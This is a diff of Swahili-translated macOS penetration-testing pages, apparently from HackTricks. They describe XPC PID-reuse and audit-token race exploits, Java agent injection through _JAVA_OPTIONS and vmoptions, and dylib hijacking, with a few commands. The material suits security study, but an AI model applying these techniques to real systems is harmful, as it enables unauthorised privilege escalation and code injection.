Kazi hii itafanya **binary iliyo ruhusiwa kuwa na PID** lakini **ujumbe mbaya wa XPC utakuwa umetumwa** kabla tu. Hivyo, ikiwa huduma ya **XPC** **itumia** **PID** kuthibitisha mtumaji na kuangalia **BAADA** ya utekelezaji wa **`posix_spawn`**, itadhani inatoka kwa mchakato **uliothibitishwa**.
### Mfano wa Exploit
Ikiwa unapata kazi **`shouldAcceptNewConnection`** au kazi inayoitwa na hiyo **ikiita** **`processIdentifier`** na si kuita **`auditToken`**. Inaweza kuwa na uwezekano mkubwa kwamba inathibitisha **PID ya mchakato** na si audit token.\
Kama kwa mfano katika picha hii (iliyopigwa kutoka kwenye rejea):
Ikiwa unapata kazi **`shouldAcceptNewConnection`** au kazi inayoitwa na hiyo **ikiita** **`processIdentifier`** na si kuita **`auditToken`**. Inaweza kuwa na uwezekano mkubwa inathibitisha **PID ya mchakato** na si audit token.\
Kama mfano katika picha hii (iliyopigwa kutoka kwenye rejea):
<figure><img src="../../../../../../images/image (306).png" alt="https://wojciechregula.blog/images/2020/04/pid.png"><figcaption></figcaption></figure>
Angalia mfano huu wa exploit (tena, uliochukuliwa kutoka kwenye rejea) ili kuona sehemu 2 za exploit:
- Moja inayoweza **kuunda forks kadhaa**
- Moja inayofanya **kuunda forks kadhaa**
- **Kila fork** itatumia **payload** kwa huduma ya XPC wakati inatekeleza **`posix_spawn`** mara tu baada ya kutuma ujumbe.
> [!CAUTION]
@ -140,7 +140,7 @@ return 0;
{{#endtab}}
{{#tab name="fork"}}
Mfano huu unatumia **`fork`** ya moja kwa moja kuzindua **watoto ambao watafaidika na hali ya mbio ya PID** na kisha kufaidika **na hali nyingine ya mbio kupitia kiungo kigumu:**
Mfano huu unatumia **`fork`** ya moja kwa moja kuzindua **watoto ambao watafaidika na hali ya mbio ya PID** na kisha kufaidika na **hali nyingine ya mbio kupitia kiungo kigumu:**
```objectivec
// export OBJC_DISABLE_INITIALIZE_FORK_SAFETY=YES
// gcc -framework Foundation expl.m -o expl

42
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc_connection_get_audit_token-attack.md
View File

@ -13,7 +13,7 @@ Ikiwa hujui Mach Messages ni nini anza kuangalia ukurasa huu:
{{#endref}}
Kwa sasa kumbuka kwamba ([mwelekeo kutoka hapa](https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing)):\
Mach messages hutumwa kupitia _mach port_, ambayo ni **channel ya mawasiliano ya mpokeaji mmoja, watumaji wengi** iliyojengwa ndani ya kernel ya mach. **Mchakato wengi wanaweza kutuma ujumbe** kwa mach port, lakini wakati wowote **mchakato mmoja tu unaweza kusoma kutoka kwake**. Kama vile file descriptors na sockets, mach ports zinagawiwa na kusimamiwa na kernel na michakato yanaona tu nambari, ambayo wanaweza kuitumia kuonyesha kwa kernel ni mach port gani wanataka kutumia.
Mach messages hutumwa kupitia _mach port_, ambayo ni **channel ya mawasiliano ya mpokeaji mmoja, watumaji wengi** iliyojengwa ndani ya kernel ya mach. **Mchakato wengi wanaweza kutuma ujumbe** kwa mach port, lakini wakati wowote **mchakato mmoja tu unaweza kusoma kutoka kwake**. Kama vile file descriptors na sockets, mach ports zinagawanywa na kusimamiwa na kernel na michakato yanaona tu nambari, ambayo wanaweza kuitumia kuonyesha kwa kernel ni mach port gani wanataka kutumia.
## XPC Connection
@ -25,32 +25,32 @@ Ikiwa hujui jinsi XPC connection inavyoundwa angalia:
## Vuln Summary
Kile ambacho ni muhimu kwako kujua ni kwamba **abstraction ya XPC ni muunganisho wa moja kwa moja**, lakini inategemea teknolojia ambayo **inaweza kuwa na watumaji wengi, hivyo:**
Kitu cha kuvutia kwako kujua ni kwamba **abstraction ya XPC ni muunganisho mmoja kwa mmoja**, lakini inategemea teknolojia ambayo **inaweza kuwa na watumaji wengi, hivyo:**
- Mach ports ni mpokeaji mmoja, **watumaji wengi**.
- Token ya ukaguzi wa XPC connection ni token ya ukaguzi ya **iliyokopwa kutoka kwa ujumbe uliopokelewa hivi karibuni**.
- Token ya ukaguzi ya XPC connection ni token ya ukaguzi ya **iliyokopwa kutoka kwa ujumbe uliopokelewa hivi karibuni**.
- Kupata **token ya ukaguzi** ya XPC connection ni muhimu kwa **ukaguzi wa usalama** wengi.
Ingawa hali ya awali inaonekana kuwa na matumaini kuna baadhi ya hali ambapo hii haitasababisha matatizo ([kutoka hapa](https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing)):
- Token za ukaguzi mara nyingi hutumiwa kwa ukaguzi wa idhini ili kuamua ikiwa kubali muunganisho. Kadri hii inavyotokea kwa kutumia ujumbe kwa huduma port, **hakuna muunganisho ulioanzishwa bado**. Ujumbe zaidi kwenye port hii utaendeshwa kama maombi ya muunganisho ya ziada. Hivyo **ukaguzi wowote kabla ya kukubali muunganisho haupo hatarini** (hii pia inamaanisha kwamba ndani ya `-listener:shouldAcceptNewConnection:` token ya ukaguzi iko salama). Kwa hivyo tunatafuta **XPC connections ambazo zinathibitisha vitendo maalum**.
- Wakati wa kushughulikia matukio ya XPC hufanywa kwa ushirikiano. Hii inamaanisha kwamba mpangilio wa tukio la ujumbe mmoja lazima ukamilishwe kabla ya kuita kwa ujumbe unaofuata, hata kwenye foleni za dispatch zinazoshirikiana. Hivyo ndani ya **XPC event handler token ya ukaguzi haiwezi kuandikwa upya** na ujumbe mwingine wa kawaida (usijibu!).
- Wakati wa kushughulikia matukio ya XPC hufanyika kwa ushirikiano. Hii inamaanisha kwamba mpokeaji wa tukio la ujumbe mmoja lazima ikamilike kabla ya kuitwa kwa ujumbe unaofuata, hata kwenye foleni za dispatch zinazofanana. Hivyo ndani ya **mpokeaji wa tukio la XPC token ya ukaguzi haiwezi kuandikwa upya** na ujumbe mwingine wa kawaida (usijibu!).
Mbinu mbili tofauti ambazo hii inaweza kuwa hatarini:
1. Variant1:
- **Exploit** **inaunganishwa** na huduma **A** na huduma **B**
- Huduma **B** inaweza kuita **kazi yenye mamlaka** katika huduma A ambayo mtumiaji hawezi
- Huduma **A** inaita **`xpc_connection_get_audit_token`** wakati _**siyo**_ ndani ya **event handler** kwa muunganisho katika **`dispatch_async`**.
- Hivyo ujumbe **mwingine** unaweza **kuandika upya Token ya Ukaguzi** kwa sababu inatumwa kwa ushirikiano nje ya mpangilio wa tukio.
- Exploit inapeleka kwa **huduma B haki ya SEND kwa huduma A**.
- Hivyo svc **B** itakuwa kwa kweli **ikipeleka** **ujumbe** kwa huduma **A**.
- **Exploit** inajaribu **kuita** **kitendo chenye mamlaka.** Katika RC svc **A** **inaangalia** idhini ya **kitendo** hiki wakati **svc B iliandika upya token ya ukaguzi** (ikiipa exploit ufikiaji wa kuita kitendo chenye mamlaka).
- Huduma **B** inaweza kuita **kazi yenye mamlaka** katika huduma A ambayo mtumiaji cannot
- Huduma **A** inaita **`xpc_connection_get_audit_token`** wakati _**siyo**_ ndani ya **mpokeaji wa tukio** kwa muunganisho katika **`dispatch_async`**.
- Hivyo ujumbe **mwingine** unaweza **kuandika upya Token ya Ukaguzi** kwa sababu inatumika kwa ushirikiano nje ya mpokeaji wa tukio.
- The exploit inapeleka kwa **huduma B haki ya SEND kwa huduma A**.
- Hivyo svc **B** itakuwa kwa kweli **ikitumika** ujumbe kwa huduma **A**.
- The **exploit** inajaribu **kuita** **kitendo chenye mamlaka.** Katika RC svc **A** **inaangalia** idhini ya **kitendo** hiki wakati **svc B iliandika upya token ya ukaguzi** (ikimpa exploit ufikiaji wa kuita kitendo chenye mamlaka).
2. Variant 2:
- Huduma **B** inaweza kuita **kazi yenye mamlaka** katika huduma A ambayo mtumiaji hawezi
- Exploit inaunganishwa na **huduma A** ambayo **inapeleka** exploit ujumbe **ukitarajia jibu** katika **port** maalum ya **replay**.
- Exploit inapeleka **huduma** B ujumbe ikipitia **port hiyo ya jibu**.
- Wakati huduma **B inajibu**, inapeleka ujumbe kwa huduma A, **wakati** **exploit** inapeleka ujumbe tofauti kwa huduma A ikijaribu **kufikia kazi yenye mamlaka** na ikitarajia kwamba jibu kutoka huduma B litaandika upya token ya ukaguzi kwa wakati mzuri (Race Condition).
- Huduma **B** inaweza kuita **kazi yenye mamlaka** katika huduma A ambayo mtumiaji cannot
- Exploit inaunganishwa na **huduma A** ambayo **inatuma** exploit ujumbe **ukitarajia jibu** katika **port** maalum ya **replay**.
- Exploit inatuma **huduma** B ujumbe ikipitia **port hiyo ya jibu**.
- Wakati huduma **B inajibu**, inatuma ujumbe kwa huduma A, **wakati** **exploit** inatuma ujumbe tofauti kwa huduma A ikijaribu **kufikia kazi yenye mamlaka** na ikitarajia kwamba jibu kutoka huduma B litaandika upya token ya ukaguzi kwa wakati mzuri (Race Condition).
## Variant 1: calling xpc_connection_get_audit_token outside of an event handler <a href="#variant-1-calling-xpc_connection_get_audit_token-outside-of-an-event-handler" id="variant-1-calling-xpc_connection_get_audit_token-outside-of-an-event-handler"></a>
@ -62,11 +62,11 @@ Hali:
- Kwa ajili ya ukaguzi huu wa idhini, **`A`** inapata token ya ukaguzi kwa ushirikiano, kwa mfano kwa kuita `xpc_connection_get_audit_token` kutoka **`dispatch_async`**.
> [!CAUTION]
> Katika kesi hii mshambuliaji anaweza kuanzisha **Race Condition** akifanya **exploit** ambayo **inaomba A kufanya kitendo** mara kadhaa huku ikifanya **B itume ujumbe kwa `A`**. Wakati RC inakuwa **na mafanikio**, **token ya ukaguzi** ya **B** itakopwa kwenye kumbukumbu **wakati** ombi la **exploit** yetu linashughulikiwa na A, ikitoa **ufikiaji wa kitendo chenye mamlaka ambacho ni B pekee angeweza kuomba**.
> Katika kesi hii mshambuliaji anaweza kuanzisha **Race Condition** akifanya **exploit** ambayo **inaomba A kufanya kitendo** mara kadhaa huku ikifanya **B itume ujumbe kwa `A`**. Wakati RC inafanikiwa, **token ya ukaguzi** ya **B** itakopwa kwenye kumbukumbu **wakati** ombi la **exploit** yetu linashughulikiwa na A, ikimpa **ufikiaji wa kitendo chenye mamlaka ambacho B pekee angeweza kuomba**.
Hii ilitokea na **`A`** kama `smd` na **`B`** kama `diagnosticd`. Kazi [`SMJobBless`](https://developer.apple.com/documentation/servicemanagement/1431078-smjobbless?language=objc) kutoka smb inaweza kutumika kufunga msaidizi mpya mwenye mamlaka (kama **root**). Ikiwa **mchakato unaofanya kazi kama root unawasiliana** na **smd**, hakuna ukaguzi mwingine utakaofanywa.
Kwa hivyo, huduma **B** ni **`diagnosticd`** kwa sababu inafanya kazi kama **root** na inaweza kutumika **kuangalia** mchakato, hivyo mara tu ufuatiliaji umeanzishwa, itapeleka **ujumbe mwingi kwa sekunde.**
Kwa hivyo, huduma **B** ni **`diagnosticd`** kwa sababu inafanya kazi kama **root** na inaweza kutumika **kuangalia** mchakato, hivyo mara tu ufuatiliaji umeanzishwa, itatuma **ujumbe mwingi kwa sekunde.**
Ili kutekeleza shambulio:
@ -81,12 +81,12 @@ Ili kutekeleza shambulio:
## Variant 2: reply forwarding
Katika mazingira ya XPC (Mawasiliano ya Mchakato Mbalimbali), ingawa wapangilio wa matukio hawatekelezi kwa ushirikiano, kushughulikia ujumbe wa majibu kuna tabia ya kipekee. Kwa hakika, kuna mbinu mbili tofauti za kutuma ujumbe zinazotarajia jibu:
Katika mazingira ya XPC (Mawasiliano ya Mchakato Mbalimbali), ingawa wapokeaji wa matukio hawatekelezi kwa ushirikiano, kushughulikia ujumbe wa jibu kuna tabia ya kipekee. Kwa hakika, kuna mbinu mbili tofauti za kutuma ujumbe zinazotarajia jibu:
1. **`xpc_connection_send_message_with_reply`**: Hapa, ujumbe wa XPC unapokelewa na kushughulikiwa kwenye foleni maalum.
2. **`xpc_connection_send_message_with_reply_sync`**: Kinyume chake, katika mbinu hii, ujumbe wa XPC unapokelewa na kushughulikiwa kwenye foleni ya sasa ya dispatch.
Tofauti hii ni muhimu kwa sababu inaruhusu uwezekano wa **pakiti za jibu kuchambuliwa kwa ushirikiano na utekelezaji wa mpangilio wa tukio la XPC**. Kwa kuzingatia, wakati `_xpc_connection_set_creds` inatekeleza kufunga ili kulinda dhidi ya kuandikwa kwa sehemu ya token ya ukaguzi, haipanui ulinzi huu kwa kitu chote cha muunganisho. Kwa hivyo, hii inaunda hatari ambapo token ya ukaguzi inaweza kubadilishwa wakati wa kipindi kati ya uchambuzi wa pakiti na utekelezaji wa mpangilio wake wa tukio.
Tofauti hii ni muhimu kwa sababu inaruhusu uwezekano wa **pakiti za jibu kuchambuliwa kwa ushirikiano na utekelezaji wa mpokeaji wa tukio la XPC**. Kwa kuzingatia, wakati `_xpc_connection_set_creds` inatekeleza kufunga ili kulinda dhidi ya kuandikwa kwa sehemu ya token ya ukaguzi, haipanui ulinzi huu kwa kitu chote cha muunganisho. Kwa hivyo, hii inaunda hatari ambapo token ya ukaguzi inaweza kubadilishwa wakati wa kipindi kati ya uchambuzi wa pakiti na utekelezaji wa mpokeaji wake wa tukio.
Ili kutumia hatari hii, mipangilio ifuatayo inahitajika:
@ -99,7 +99,7 @@ Mchakato wa kutumia hatari unajumuisha hatua zifuatazo:
1. Subiri huduma **`A`** itume ujumbe unaotarajia jibu.
2. Badala ya kujibu moja kwa moja kwa **`A`**, port ya jibu inatekwa na kutumika kutuma ujumbe kwa huduma **`B`**.
3. Kisha, ujumbe unaohusisha kitendo kisichoruhusiwa unatolewa, ukiwa na matarajio kwamba utashughulikiwa kwa ushirikiano na jibu kutoka **`B`**.
3. Kisha, ujumbe unaohusisha kitendo kisichoruhusiwa unatumwa, ukiwa na matarajio kwamba utashughulikiwa kwa ushirikiano na jibu kutoka **`B`**.
Hapa kuna picha ya kuwakilisha hali ya shambulio iliyoelezewa:
@ -110,9 +110,9 @@ Hapa kuna picha ya kuwakilisha hali ya shambulio iliyoelezewa:
## Discovery Problems
- **Changamoto katika Kutafuta Matukio**: Kutafuta matukio ya matumizi ya `xpc_connection_get_audit_token` ilikuwa ngumu, kwa njia ya statically na dynamically.
- **Mbinu**: Frida ilitumika kuunganisha kazi ya `xpc_connection_get_audit_token`, ikichuja wito ambao haujatoka kwa wapangilio wa matukio. Hata hivyo, mbinu hii ilikuwa na mipaka kwa mchakato uliounganishwa na ilihitaji matumizi ya moja kwa moja.
- **Mbinu**: Frida ilitumika kuunganisha kazi ya `xpc_connection_get_audit_token`, ikichuja wito ambao haujatoka kwa wapokeaji wa matukio. Hata hivyo, mbinu hii ilikuwa na mipaka kwa mchakato uliounganishwa na ilihitaji matumizi ya moja kwa moja.
- **Zana za Uchambuzi**: Zana kama IDA/Ghidra zilitumika kuchunguza huduma za mach zinazoweza kufikiwa, lakini mchakato ulikuwa wa muda mrefu, ukichanganywa na wito unaohusisha cache ya pamoja ya dyld.
- **Mipaka ya Scripting**: Jaribio la kuandika script ya uchambuzi wa wito kwa `xpc_connection_get_audit_token` kutoka kwa blocks za `dispatch_async` lilikwamishwa na changamoto katika kuchambua blocks na mwingiliano na cache ya pamoja ya dyld.
- **Mipaka ya Scripting**: Jaribio la kuandika script ya uchambuzi wa wito kwa `xpc_connection_get_audit_token` kutoka kwa blocks za `dispatch_async` lilikwamishwa na changamoto katika uchambuzi wa blocks na mwingiliano na cache ya pamoja ya dyld.
## The fix <a href="#the-fix" id="the-fix"></a>

4
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-java-apps-injection.md
View File

@ -125,10 +125,10 @@ open --env "_JAVA_OPTIONS='-javaagent:/tmp/Agent.jar'" -a "Burp Suite Profession
```
## vmoptions file
Fail hii inasaidia kufafanua **Java params** wakati Java inatekelezwa. Unaweza kutumia baadhi ya hila za awali kubadilisha java params na **kufanya mchakato utekeleze amri zisizo za kawaida**.\
Fail hii inasaidia kufafanua **Java params** wakati Java inatekelezwa. Unaweza kutumia baadhi ya hila za awali kubadilisha java params na **kufanya mchakato utekeleze amri zisizo na mipaka**.\
Zaidi ya hayo, faili hii pia inaweza **kujumuisha nyingine** na saraka ya `include`, hivyo unaweza pia kubadilisha faili iliyojumuishwa.
Zaidi ya hayo, baadhi ya programu za Java zitakuwa **zinapakia zaidi ya moja `vmoptions`** faili.
Zaidi ya hayo, baadhi ya programu za Java zitakuwa **zinaweza kupakia zaidi ya moja `vmoptions`** faili.
Baadhi ya programu kama Android Studio zinaonyesha katika **matokeo yao ambapo wanatafuta** faili hizi, kama:
```bash

58
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/README.md
View File

@ -20,7 +20,7 @@ Hii ni kama [**LD_PRELOAD kwenye Linux**](../../../../linux-hardening/privilege-
Teknolojia hii inaweza pia **kutumika kama mbinu ya ASEP** kwani kila programu iliyosakinishwa ina plist inayoitwa "Info.plist" ambayo inaruhusu **kuweka variables za mazingira** kwa kutumia ufunguo unaoitwa `LSEnvironmental`.
> [!NOTE]
> Tangu mwaka 2012 **Apple imepunguza kwa kiasi kikubwa nguvu** ya **`DYLD_INSERT_LIBRARIES`**.
> Tangu 2012 **Apple imepunguza kwa kiasi kikubwa nguvu** ya **`DYLD_INSERT_LIBRARIES`**.
>
> Nenda kwenye msimbo na **angalia `src/dyld.cpp`**. Katika kazi **`pruneEnvironmentVariables`** unaweza kuona kuwa **`DYLD_*`** variables zimeondolewa.
>
@ -28,12 +28,12 @@ Teknolojia hii inaweza pia **kutumika kama mbinu ya ASEP** kwani kila programu i
>
> - Binary ni `setuid/setgid`
> - Uwepo wa sehemu `__RESTRICT/__restrict` katika binary ya macho.
> - Programu ina haki (hardened runtime) bila [`com.apple.security.cs.allow-dyld-environment-variables`](https://developer.apple.com/documentation/bundleresources/entitlements/com_apple_security_cs_allow-dyld-environment-variables) haki
> - Programu ina haki (runtime iliyohardishwa) bila [`com.apple.security.cs.allow-dyld-environment-variables`](https://developer.apple.com/documentation/bundleresources/entitlements/com_apple_security_cs_allow-dyld-environment-variables) haki
> - Angalia **haki** za binary na: `codesign -dv --entitlements :- </path/to/bin>`
>
> Katika toleo za kisasa zaidi unaweza kupata mantiki hii katika sehemu ya pili ya kazi **`configureProcessRestrictions`.** Hata hivyo, kile kinachotekelezwa katika toleo jipya ni **ukaguzi wa mwanzo wa kazi** (unaweza kuondoa ifs zinazohusiana na iOS au simulation kwani hizo hazitatumika katika macOS).
> Katika toleo za kisasa zaidi unaweza kupata mantiki hii katika sehemu ya pili ya kazi **`configureProcessRestrictions`.** Hata hivyo, kile kinachotekelezwa katika toleo jipya ni **ukaguzi wa mwanzo wa kazi** (unaweza kuondoa ifs zinazohusiana na iOS au simulation kwani hizo hazitatumika katika macOS.
### Uthibitishaji wa Maktaba
### Library Validation
Hata kama binary inaruhusu kutumia variable ya mazingira **`DYLD_INSERT_LIBRARIES`**, ikiwa binary inakagua saini ya maktaba ili kuipakia haitapakia maktaba ya kawaida.
@ -42,9 +42,9 @@ Ili kupakia maktaba ya kawaida, binary inahitaji kuwa na **moja ya haki zifuataz
- [`com.apple.security.cs.disable-library-validation`](../../macos-security-protections/macos-dangerous-entitlements.md#com.apple.security.cs.disable-library-validation)
- [`com.apple.private.security.clear-library-validation`](../../macos-security-protections/macos-dangerous-entitlements.md#com.apple.private.security.clear-library-validation)
au binary **haipaswi** kuwa na **bendera ya hardened runtime** au **bendera ya uthibitishaji wa maktaba**.
au binary **haipaswi** kuwa na **bendera ya runtime iliyohardishwa** au **bendera ya uthibitishaji wa maktaba**.
Unaweza kuangalia ikiwa binary ina **hardened runtime** kwa kutumia `codesign --display --verbose <bin>` ukikagua bendera ya runtime katika **`CodeDirectory`** kama: **`CodeDirectory v=20500 size=767 flags=0x10000(runtime) hashes=13+7 location=embedded`**
Unaweza kuangalia ikiwa binary ina **runtime iliyohardishwa** kwa kutumia `codesign --display --verbose <bin>` ukikagua bendera ya runtime katika **`CodeDirectory`** kama: **`CodeDirectory v=20500 size=767 flags=0x10000(runtime) hashes=13+7 location=embedded`**
Unaweza pia kupakia maktaba ikiwa ime **sainiwa kwa cheti sawa na binary**.
@ -60,11 +60,11 @@ macos-dyld-hijacking-and-dyld_insert_libraries.md
> Kumbuka kwamba **vizuizi vya awali vya Uthibitishaji wa Maktaba pia vinatumika** kufanya mashambulizi ya Dylib hijacking.
Kama ilivyo katika Windows, katika MacOS unaweza pia **kuchukua dylibs** ili kufanya **programu** **kutekeleza** **msimbo** **wowote** (vizuri, kwa kweli kutoka kwa mtumiaji wa kawaida hii inaweza isiwezekane kwani unaweza kuhitaji ruhusa ya TCC kuandika ndani ya kifurushi cha `.app` na kuchukua maktaba).\
Hata hivyo, njia ambayo **MacOS** programu **zinavyopakia** maktaba ni **zaidi ya kizuizi** kuliko katika Windows. Hii inamaanisha kwamba **waendelezaji wa malware** bado wanaweza kutumia mbinu hii kwa **kujificha**, lakini uwezekano wa kuweza **kuvitumia hivi kuongeza mamlaka ni mdogo sana**.
Hata hivyo, njia ambayo **programu za MacOS** **zinapakia** maktaba ni **zaidi ya kizuizi** kuliko katika Windows. Hii ina maana kwamba **waendelezaji wa malware** bado wanaweza kutumia mbinu hii kwa **kujificha**, lakini uwezekano wa kuweza **kuabudu hii ili kupandisha mamlaka ni mdogo sana**.
Kwanza kabisa, ni **ya kawaida zaidi** kupata kwamba **MacOS binaries inaonyesha njia kamili** za maktaba za kupakia. Na pili, **MacOS kamwe haitafuti** katika folda za **$PATH** kwa maktaba.
Kwanza kabisa, ni **ya kawaida zaidi** kupata kwamba **binaries za MacOS zinaonyesha njia kamili** za maktaba za kupakia. Na pili, **MacOS kamwe haitafuta** katika folda za **$PATH** kwa ajili ya maktaba.
Sehemu **kuu** ya **msimbo** inayohusiana na kazi hii iko katika **`ImageLoader::recursiveLoadLibraries`** katika `ImageLoader.cpp`.
Sehemu **kuu** ya **msimbo** unaohusiana na kazi hii iko katika **`ImageLoader::recursiveLoadLibraries`** katika `ImageLoader.cpp`.
Kuna **amri 4 tofauti za kichwa** ambazo binary ya macho inaweza kutumia kupakia maktaba:
@ -75,8 +75,8 @@ Kuna **amri 4 tofauti za kichwa** ambazo binary ya macho inaweza kutumia kupakia
Hata hivyo, kuna **aina 2 za dylib hijacking**:
- **Maktaba za dhaifu zilizokosekana**: Hii inamaanisha kwamba programu itajaribu kupakia maktaba ambayo haipo iliyowekwa na **LC_LOAD_WEAK_DYLIB**. Kisha, **ikiwa mshambuliaji anaweka dylib mahali inatarajiwa itapakiwa**.
- Ukweli kwamba kiungo ni "dhaifu" inamaanisha kwamba programu itaendelea kufanya kazi hata kama maktaba haipatikani.
- **Maktaba za dhaifu zilizokosekana**: Hii ina maana kwamba programu itajaribu kupakia maktaba ambayo haipo iliyowekwa na **LC_LOAD_WEAK_DYLIB**. Kisha, **ikiwa mshambuliaji anaweka dylib mahali inatarajiwa itapakiwa**.
- Ukweli kwamba kiungo ni "dhaifu" ina maana kwamba programu itaendelea kufanya kazi hata kama maktaba haipatikani.
- **Msimbo unaohusiana** na hii uko katika kazi `ImageLoaderMachO::doGetDependentLibraries` ya `ImageLoaderMachO.cpp` ambapo `lib->required` ni tu `false` wakati `LC_LOAD_WEAK_DYLIB` ni kweli.
- **Pata maktaba dhaifu zilizokosekana** katika binaries na (una mfano baadaye wa jinsi ya kuunda maktaba za kuchukua):
- ```bash
@ -87,20 +87,20 @@ time stamp 2 Wed Jun 21 12:23:31 1969
current version 1.0.0
compatibility version 1.0.0
```
- **Iliyowekwa na @rpath**: Mach-O binaries zinaweza kuwa na amri **`LC_RPATH`** na **`LC_LOAD_DYLIB`**. Kulingana na **maadili** ya amri hizo, **maktaba** zitapakiwa kutoka **folda tofauti**.
- **Iliyowekwa na @rpath**: Binaries za Mach-O zinaweza kuwa na amri **`LC_RPATH`** na **`LC_LOAD_DYLIB`**. Kulingana na **maadili** ya amri hizo, **maktaba** zitapakiwa kutoka **folda tofauti**.
- **`LC_RPATH`** ina njia za baadhi ya folda zinazotumika kupakia maktaba na binary.
- **`LC_LOAD_DYLIB`** ina njia za maktaba maalum za kupakia. Njia hizi zinaweza kuwa na **`@rpath`**, ambayo itabadilishwa na maadili katika **`LC_RPATH`**. Ikiwa kuna njia kadhaa katika **`LC_RPATH`** kila mmoja atatumika kutafuta maktaba ya kupakia. Mfano:
- Ikiwa **`LC_LOAD_DYLIB`** ina `@rpath/library.dylib` na **`LC_RPATH`** ina `/application/app.app/Contents/Framework/v1/` na `/application/app.app/Contents/Framework/v2/`. Folda zote mbili zitatumika kupakia `library.dylib`**.** Ikiwa maktaba haipo katika `[...]/v1/` na mshambuliaji anaweza kuipatia hapo ili kuchukua upakiaji wa maktaba katika `[...]/v2/` kwani mpangilio wa njia katika **`LC_LOAD_DYLIB`** unafuata.
- Ikiwa **`LC_LOAD_DYLIB`** ina `@rpath/library.dylib` na **`LC_RPATH`** ina `/application/app.app/Contents/Framework/v1/` na `/application/app.app/Contents/Framework/v2/`. Folda zote mbili zitatumika kupakia `library.dylib`**.** Ikiwa maktaba haipo katika `[...]/v1/` na mshambuliaji anaweza kuiweka hapo ili kuchukua upakiaji wa maktaba katika `[...]/v2/` kwani mpangilio wa njia katika **`LC_LOAD_DYLIB`** unafuata.
- **Pata njia za rpath na maktaba** katika binaries na: `otool -l </path/to/binary> | grep -E "LC_RPATH|LC_LOAD_DYLIB" -A 5`
> [!NOTE] > **`@executable_path`**: Ni **njia** ya folda inayoshikilia **faili kuu ya kutekeleza**.
>
> **`@loader_path`**: Ni **njia** ya **folda** inayoshikilia **binary ya Mach-O** ambayo ina amri ya kupakia.
> **`@loader_path`**: Ni **njia** ya **folda** inayoshikilia **binary ya Mach-O** ambayo ina amri ya upakiaji.
>
> - Inapotumika katika executable, **`@loader_path`** ni kwa ufanisi **sawa** na **`@executable_path`**.
> - Inapotumika katika **dylib**, **`@loader_path`** inatoa **njia** kwa **dylib**.
Njia ya **kuongeza mamlaka** kwa kutumia kazi hii itakuwa katika kesi nadra ambapo **programu** inayotekelezwa **na** **root** inatafuta **maktaba katika folda fulani ambapo mshambuliaji ana ruhusa za kuandika.**
Njia ya **kupandisha mamlaka** kwa kutumia kazi hii itakuwa katika kesi nadra ambapo **programu** inayotekelezwa **na** **root** inatafuta **maktaba katika folda ambayo mshambuliaji ana ruhusa za kuandika.**
> [!TIP]
> Scanner mzuri wa kupata **maktaba zilizokosekana** katika programu ni [**Dylib Hijack Scanner**](https://objective-see.com/products/dhs.html) au [**toleo la CLI**](https://github.com/pandazheng/DylibHijack).\
@ -119,7 +119,7 @@ macos-dyld-hijacking-and-dyld_insert_libraries.md
Kutoka **`man dlopen`**:
- Wakati njia **haijumuishi tabia ya slash** (yaani ni jina tu la majani), **dlopen() itafanya utafutaji**. Ikiwa **`$DYLD_LIBRARY_PATH`** ilipangwa wakati wa uzinduzi, dyld kwanza **itaangalia katika folda hiyo**. Kisha, ikiwa faili ya mach-o inayopiga simu au executable kuu inabainisha **`LC_RPATH`**, basi dyld itatafuta katika folda hizo. Kisha, ikiwa mchakato ni **usio na kizuizi**, dyld itatafuta katika **folda ya kazi ya sasa**. Mwishowe, kwa binaries za zamani, dyld itajaribu baadhi ya njia mbadala. Ikiwa **`$DYLD_FALLBACK_LIBRARY_PATH`** ilipangwa wakati wa uzinduzi, dyld itatafuta katika **folda hizo**, vinginevyo, dyld itatafuta katika **`/usr/local/lib/`** (ikiwa mchakato ni usio na kizuizi), na kisha katika **`/usr/lib/`** (habari hii ilichukuliwa kutoka **`man dlopen`**).
- Wakati njia **haijumuishi tabia ya slash** (yaani ni jina tu la majani), **dlopen() itafanya utafutaji**. Ikiwa **`$DYLD_LIBRARY_PATH`** ilipangwa wakati wa uzinduzi, dyld kwanza **itaangalia katika folda hiyo**. Kisha, ikiwa faili ya macho inayopiga simu au executable kuu inabainisha **`LC_RPATH`**, basi dyld itatafuta katika folda hizo. Kisha, ikiwa mchakato ni **usio na kizuizi**, dyld itatafuta katika **folda ya kazi ya sasa**. Mwishowe, kwa binaries za zamani, dyld itajaribu baadhi ya njia mbadala. Ikiwa **`$DYLD_FALLBACK_LIBRARY_PATH`** ilipangwa wakati wa uzinduzi, dyld itatafuta katika **folda hizo**, vinginevyo, dyld itatafuta katika **`/usr/local/lib/`** (ikiwa mchakato ni usio na kizuizi), na kisha katika **`/usr/lib/`** (habari hii ilichukuliwa kutoka **`man dlopen`**).
1. `$DYLD_LIBRARY_PATH`
2. `LC_RPATH`
3. `CWD`(ikiwa haina kizuizi)
@ -130,12 +130,12 @@ Kutoka **`man dlopen`**:
> [!CAUTION]
> Ikiwa hakuna slashes katika jina, kutakuwa na njia 2 za kufanya hijacking:
>
> - Ikiwa **`LC_RPATH`** yoyote ni **ya kuandikwa** (lakini saini inakaguliwa, hivyo kwa hili unahitaji pia binary kuwa isiyo na kizuizi)
> - Ikiwa **`LC_RPATH`** yoyote ni **ya kuandika** (lakini saini inakaguliwa, hivyo kwa hili unahitaji pia binary kuwa isiyo na kizuizi)
> - Ikiwa binary ni **isiyo na kizuizi** na kisha inawezekana kupakia kitu kutoka CWD (au kutumia moja ya variable za env zilizotajwa)
